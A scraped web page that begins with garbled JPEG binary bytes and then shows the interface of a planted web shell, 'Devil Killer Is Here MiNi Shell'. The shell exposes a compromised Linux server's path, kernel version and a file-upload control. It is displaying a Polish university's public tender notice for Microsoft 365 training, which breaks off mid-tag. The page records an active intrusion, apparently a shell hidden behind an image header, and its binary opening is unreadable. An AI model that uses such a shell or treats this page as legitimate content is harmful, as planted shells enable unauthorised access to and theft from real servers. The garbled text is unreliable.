JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20221012/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20221012/0038821101-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Usługa przeprowadzenia szkoleń z zakresu obsługi wybranych programów Microsoft 365 oraz narzędzi do komunikacji i promocji zgodnie z zakresem merytorycznym projektów. - liczba części 3. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Uniwersytet Przyrodniczy w Poznaniu</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000001844</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Wojska Polskiego 28</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Poznań</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">60-637</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">wielkopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL415 - Miasto Poznań</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">agnieszka.bartkowiak@up.poznan.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.up.poznan.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - uczelnia publiczna</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Edukacja</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Usługa przeprowadzenia szkoleń z zakresu obsługi wybranych programów Microsoft 365 oraz narzędzi do komunikacji i promocji zgodnie z zakresem merytorycznym projektów. - liczba części 3. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-f4c85db6-494b-11ed-9171-f6b7c7d59353</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00388211</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-10-12</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00040653/08/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.9 Szkolenia dla administracji</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> Najlepsi z natury! Zintegrowany Program Rozwoju Uniwersytetu Przyrodniczego w Poznaniu zwanym dalej Zintegrowanym Programem Uczelni oraz Najlepsi z natury 2.0. Zintegrowany Program Uniwersytetu Przyrodniczego w Poznaniu zwanym dalej Zintegrowanym Programem Uczelni 2.0. </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://up-poznan.logintrade.net/ <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://up-poznan.logintrade.net/</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Komunikacja między zamawiającym a wykonawcami odbywa się przy użyciu Platformy Przetargowej znajdującej się pod adresem https://up-poznan.logintrade.net/ (dalej: Platforma Przetargowa). <br/>Do połączenia używany jest szyfrowany protokół HTTPS. Szyfrowanie danych odbywa się przy pomocy protokołu SSL. Certyfikat SSL zapewnia poufność transmisji danych przesyłanych przez Internet. Wykonawca posiadający konto na Platformie Przetargowej ma dostęp do możliwości złożenia i wycofania oferty, a także funkcjonalności pozwalających na zadawanie pytań do treści SWZ oraz komunikację z zamawiającym w pozostałych obszarach. <br/>Wymagania techniczne urządzeń informatycznych, niezbędnych do prawidłowego korzystania z Platformy Przetargowej opisane są na stronie: <br/>https://up-poznan.logintrade.net/reg,info,wymaganiatechniczne.html <br/>Maksymalny rozmiar plików przesyłanych za pośrednictwem dedykowanych formularzy do: złożenia i wycofania oferty oraz do komunikacji wynosi 150 MB.<br/>Ofertę, w tym wszelkie dokumenty i oświadczenia sporządza się, pod rygorem nieważności:<br/>a)	w formie elektronicznej (z kwalifikowanym podpisem elektronicznym) lub<br/>b)	w postaci elektronicznej opatrzonej podpisem zaufanym lub<br/>c)	w postaci elektronicznej opatrzonej podpisem osobistym <br/>- przez osoby upoważnione do składania w imieniu wykonawcy oświadczeń woli.<br/>Oferta musi być podpisana przez osoby upoważnione do reprezentowania Wykonawcy (wykonawców wspólnie ubiegających się o udzielenie zamówienia). <br/>Dokumenty elektroniczne przekazywane za pośrednictwem środków komunikacji elektronicznej, są sporządzane w formatach danych określonych w przepisach wydanych na podstawie art. 18 ustawy z dnia 17 lutego 2005 r. o informatyzacji działalności podmiotów realizujących zadania publiczne (Dz. U z 2020 r. poz. 346, 568, 695, 1517 i 2320), z zastrzeżeniem formatów, o których mowa w art. 66 ust. 1 ustawy, z uwzględnieniem rodzaju przekazywanych danych. Zamawiający rekomenduje wykorzystanie formatu danych przesyłanych plików: pdf.<br/>W celu ewentualnych kompresji danych, zamawiający rekomenduje wykorzystanie jednego z formatów:<br/>a)	.zip<br/>b)	.7Z<br/>Zamawiający zaleca przekonwertowanie plików składających się na ofertę na format PDF i opatrzenie ich podpisem kwalifikowanym PAdES, ze względu na niskie ryzyko naruszenia integralności pliku oraz łatwiejszą weryfikację kwalifikowanego podpisu elektronicznego.<br/>Pliki w innych formatach niż PDF zaleca się opatrzyć zewnętrznym podpisem XAdES. Wykonawca powinien pamiętać, aby plik z podpisem przekazywać łącznie z dokumentem podpisywanym. <br/>Sposób sporządzania dokumentów elektronicznych, cyfrowych odwzorowań dokumentów oraz informacji musi być zgodny z wymaganiami określonymi w rozporządzeniu Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie (Dz. U z 2020 r. poz. 2452).<br/>Kodowanie i oznaczenie czasu przekazania danych: Czas zapisywany jest w formacie YYYY-MM-DD HH:MM:SS. Czas przekazania danych jest to czas, w którym zostanie potwierdzone złożenie oferty/ dokumentu przez wykonawcę. W przypadku wybrania opcji złożenia oferty bez logowania, potwierdzenie odbywa się poprzez kliknięcie w link ”Potwierdzam” dostępny w wiadomości mailowej, wysłanej automatycznie po złożeniu oferty/dokumentu, będąc niezalogowanym na Platformie Przetargowej. Wiadomość otrzymuje wykonawca na adres e-mail wskazany w formularzu po kliknięciu w ikonę „Złóż ofertę”. W przypadku wykonawcy zalogowanego na Platformie Przetargowej, czas przekazania danych jest to czas wysłania oferty/dokumentu przez Platformę Przetargową.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych <br/>i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”, zamawiający informuje, że: <br/>a)	administratorem danych osobowych przekazywanych przez wykonawców jest Uniwersytet Przyrodniczy w Poznaniu, ul. Wojska Polskiego 28 60-637 Poznań<br/>b)	inspektorem ochrony danych osobowych w Uniwersytecie Przyrodniczym w Poznaniu jest Pan Tomasz Napierała tomasz.napierala@up.poznan.pl tel. 61 848-7799<br/>uzyskane dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z postępowaniem o udzielenie zamówienia publicznego na : Usługa przeprowadzenia szkoleń <br/>z zakresu obsługi wybranych programów Microsoft 365 oraz narzędzi do komunikacji i promocji zgodnie z zakresem merytorycznym projektów pt. „Najlepsi z natury! Zintegrowany Program Rozwoju Uniwersytetu Przyrodniczego w Poznaniu” oraz „Najlepsi z natury 2.0. Zintegrowany Program Uniwersytetu Przyrodniczego w Poznaniu.” – liczba części 3 (nr postępowania 628/AZ/262/2022) prowadzonym w trybie podstawowym, na podstawie art. 275 pkt 1 ustawy Pzp.<br/>c)	odbiorcami danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 18 oraz art. 74 ust. 1 ustawy Pzp<br/>d)	dane osobowe będą przechowywane, zgodnie z art. 78 ustawy Pzp, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały okres obowiązywania umowy;<br/>e)	podanie przez wykonawcę danych osobowych jest dobrowolne, lecz równocześnie jest wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawy Pzp; <br/>f)	w odniesieniu do danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22 RODO;<br/>g)	wykonawcy oraz osoby, których dane osobowe zostały podane w związku z postępowaniem posiadają:<br/>	na podstawie art. 15 RODO prawo dostępu do danych osobowych <br/>	na podstawie art. 16 RODO prawo do sprostowania danych osobowych **;<br/>	na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO ***; <br/>	prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych dotyczących narusza przepisy RODO;<br/>	nie przysługuje Wykonawcom oraz osobom, których dane osobowe zostały podane w związku z postępowaniem:<br/>	w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>	prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>	na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO. <br/>______________________<br/>* Wyjaśnienie: informacja w tym zakresie jest wymagana, jeżeli w odniesieniu do danego administratora lub podmiotu przetwarzającego istnieje obowiązek wyznaczenia inspektora ochrony danych osobowych.<br/>** Wyjaśnienie: skorzystanie z prawa do sprostowania nie może skutkować zmianą wyniku postępowania<br/>o udzielenie zamówienia publicznego ani zmianą postanowień umowy w zakresie niezgodnym z ustawą Pzp oraz nie może naruszać integralności protokołu oraz jego załączników.<br/>*** Wyjaśnienie: prawo do ograniczenia przetwarzania nie ma zastosowania w odniesieniu do przechowywania, w celu zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub prawnej, lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwa członkowskiego.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">628/AZ/262/2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">3</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> CZĘŚĆ I: KURS EXCEL – POZIOM PODSTAWOWY.<br/><br/>Szkolenie: Kurs Excel – poziom podstawowy.<br/><br/>Projekt	Zintegrowany Program Uczelni<br/>Liczba godzin [45’] na edycję	16<br/>Liczba edycji	6<br/>Grupa docelowa	Pracownicy kadry administracyjnej i zarządczej Uniwersytetu Przyrodniczego w Poznaniu<br/>Średnia liczba osób/edycję	Średnia wielkość grupy 12-14 osób<br/>Przewidywana liczba osób	60<br/>Formuła	Stacjonarna/zdalna*<br/>Łączna liczba godzin	96<br/>Termin realizacji zamówienia	do 30.11.2023<br/>*co do zasady szkolenia są stacjonarne, w uzasadnionych przypadkach Zamawiający może zlecić realizację szkolenia w formie zdalnej<br/>	<br/>Zakres tematyki szkolenia:<br/>Celem szkolenia jest podniesienie kompetencji informatycznych w celu usprawnienia pracy biurowej w obszarze obsługi programu MS Excel. <br/>a)	podstawowe funkcje w Excelu<br/>b)	zaznaczanie, wprowadzanie i edycja danych<br/>c)	formatowanie komórek<br/>d)	zestawienie - formatowanie danych<br/>e)	tworzenie i obliczanie formuł za pomocą funkcji logicznych<br/>f)	poznanie podstawowych funkcji i narzędzi umożliwiających tworzenie raportów oraz pracy z dużą ilością danych<br/>g)	praca z dużą ilością danych: filtrowanie, tworzenie tabel, wstęp do tabel przestawnych<br/>h)	tworzenie wykresów<br/>i)	zabezpieczanie arkusza przed modyfikacją danych<br/>j)	drukowanie<br/><br/>Metody dydaktyczne: prezentacja ćwiczenia, dyskusja warsztat<br/>Forma zajęć: interaktywna i warsztatowa.<br/>Zamawiający wymaga, aby Wykonawca zapewnił bezpłatnie pełną wersję programów umożliwiających przeprowadzenie szkoleń dla każdego/ej z uczestników/czek. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">80500000-9 - Usługi szkoleniowe</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> Zamawiający przewiduje prawo opcji polegające na:<br/>a)	ograniczeniu do 1 (jednej) edycji zaplanowanego szkolenia, w sytuacji zrekrutowania zbyt małej liczby chętnych osób. W takim przypadku Wykonawcy nie będzie przysługiwać roszczenie o zapłatę różnicy między faktycznie zrealizowanymi szkoleniami, a maksymalną wartością brutto zawartej umowy. Rozliczenie nastąpi na podstawie realnego zapotrzebowania Zamawiającego.<br/>b)	Zamawiający dopuszcza w ramach prawa opcji możliwość udzielenia zamówienia dla dodatkowej liczby edycji, większej niż liczba edycji przewidziana w zamówieniu, do 50% wartości umowy, w przypadku konieczności uruchomienia dodatkowej rekrutacji uzupełniającej. <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2023-11-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">W CZĘŚCI I: KURS EXCEL – POZIOM PODSTAWOWY<br/><br/><br/>1.	Cena	60%<br/>2.	Doświadczenie Trenera	40%<br/><br/>Kryterium nr 1 – Cena 60%<br/>Maksymalna liczba punktów możliwa do uzyskania w kryterium cena to 60 punktów.<br/>Punkty zostaną wyliczone według wzoru:<br/><br/>całkowita wartość brutto oferty najniższej<br/>---------------------------------------------------------------- x 60 = M<br/>całkowita wartość brutto oferty badanej<br/><br/>M – liczba punktów uzyskana przez ofertę w kryterium cena<br/>UWAGA! Całkowita wartość brutto oferty oznacza cenę zaoferowaną przez Wykonawcę w formularzu ofertowym za przeprowadzenie wszystkich edycji szkolenia.<br/><br/>Kryterium nr 2 – Doświadczenie Trenera – 40%<br/>Maksymalna liczba punktów możliwa do uzyskania w tym kryterium to 40 punktów.<br/>Łączna wartość punktów uzależniona jest od dodatkowego doświadczenia trenera wyznaczonego do realizacji danego zamówienia w przeprowadzeniu szkoleń dla osób dorosłych z tematyki opisanej w rozdziale III ppkt 3.1.1 SWZ. oraz posiadania przez trenera uprawnienia Egzaminatora ECDL (Europejski Certyfikat Umiejętności Komputerowych).<br/>Ocenie będzie podlegał jeden trener, wskazany przez Wykonawcę na warunek udziału w postępowaniu.<br/><br/>Zamawiający najpierw przyzna punkty:<br/>a)	za dodatkowe doświadczenie<br/>oraz<br/>b)	za posiadanie stosownego certyfikatu potwierdzającego uprawnienia Egzaminatora ECDL. <br/>Suma punktów (a+b) uzyskanych przez trenera będzie stanowiła ocenę za kryterium – doświadczenie trenera.<br/><br/>Dodatkowe doświadczenie trenera<br/>Uwaga: Przez dodatkowe doświadczenia trenera należy rozumieć doświadczenie inne niż 96h doświadczenia wykazywanego na potwierdzenie spełniania warunku udziału w postępowaniu. <br/><br/>Punkty zostaną przyznane według poniższej tabeli:<br/>Liczba godzin przeprowadzonych szkoleń w ciągu ostatnich 3 lat z zakresu tematyki opisanej w rozdziale III ppkt 3.1.1 SWZ <br/>Liczba punktów możliwa do uzyskania: <br/>1h - 96h	1<br/>97h - 129h	8<br/>130h - 162h	16<br/>163h - 195h	24<br/>≥ niż 196h	32<br/><br/>Posiadanie uprawnień Egzaminatora ECDL<br/>Punkty zostaną przyznane według:<br/>Nie posiada	0 punktów<br/>Posiada	8 punktów</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie trenera</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> CZĘŚĆ II: MICROSOFT OFFICE.<br/><br/>Szkolenie: Ms Office – kurs podstawowy.<br/><br/>Projekt	Zintegrowany Program Uczelni 2.0.<br/>Liczba godzin [45’] na edycję	24<br/>Liczba edycji	3<br/>Grupa docelowa	Pracownicy kadry administracyjnej i zarządczej Uniwersytetu Przyrodniczego w Poznaniu<br/>Średnia liczba osób/edycję	Średnia wielkość grupy 12-14 osób<br/>Przewidywana liczba osób	30<br/>Formuła	Stacjonarna/zdalna*<br/>Łączna liczba godzin	72<br/>Termin realizacji zamówienia	do 30.11.2023<br/>*co do zasady szkolenia są stacjonarne, w uzasadnionych przypadkach Zamawiający może zlecić realizację szkolenia w formie zdalnej<br/><br/>Zakres tematyki szkolenia:<br/>Celem szkolenia jest podniesienie kompetencji informatycznych w celu usprawnienia pracy biurowej w obszarze obsługi wybranych programów MS Office (Word, Outlook, Teams) na poziomie podstawowym.<br/>a)	Ms Teams (ok. 4h): <br/>•	podstawowe informacje o programie<br/>•	chat i rozmowy<br/>•	zespoły<br/>•	spotkania<br/>•	korzystanie z plików<br/>b)	Ms Outlook (ok. 4h):<br/>•	tworzenie wiadomości<br/>•	rodzaje odbiorców (DW UDW)<br/>•	dodawanie załączników<br/>•	ustawianie podpisu<br/>•	autoresponder<br/>•	tworzenie książek adresowych<br/>•	kalendarz<br/>c)	Ms Word (ok. 16h):<br/>•	Wprowadzenie<br/>•	tworzenie nowego dokumentu i zarządzanie nim (zapisywanie pliku, wybór wersji, tworzenie nowego dokumentu itp.)<br/>•	podstawowe formatowanie tekstu (czcionka, wielkość znaków, kolor, zaznaczenie, malarz formatów itp.)<br/>•	style tekstu<br/>•	właściwości akapitu<br/>•	narzędzia kopiowania, wklejania i wycinania<br/>•	wstawianie tabel, grafik, wykresów i hiperłączy i ich formatowanie<br/>•	ustawienia strony (orientacja, rozmiar, marginesy)<br/>•	nagłówek i stopka<br/>•	sprawdzanie poprawności pisowni<br/>•	śledzenie zmian, komentarze<br/>•	przydatne skróty klawiszowe<br/>•	drukowanie i przygotowanie do wydruku<br/>Metody dydaktyczne: prezentacja ćwiczenia, dyskusja warsztat<br/>Forma zajęć: interaktywna i warsztatowa.<br/>Zamawiający wymaga, aby Wykonawca zapewnił bezpłatnie pełną wersję programów umożliwiających przeprowadzenie szkoleń dla każdego/ej z uczestników/czek. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span 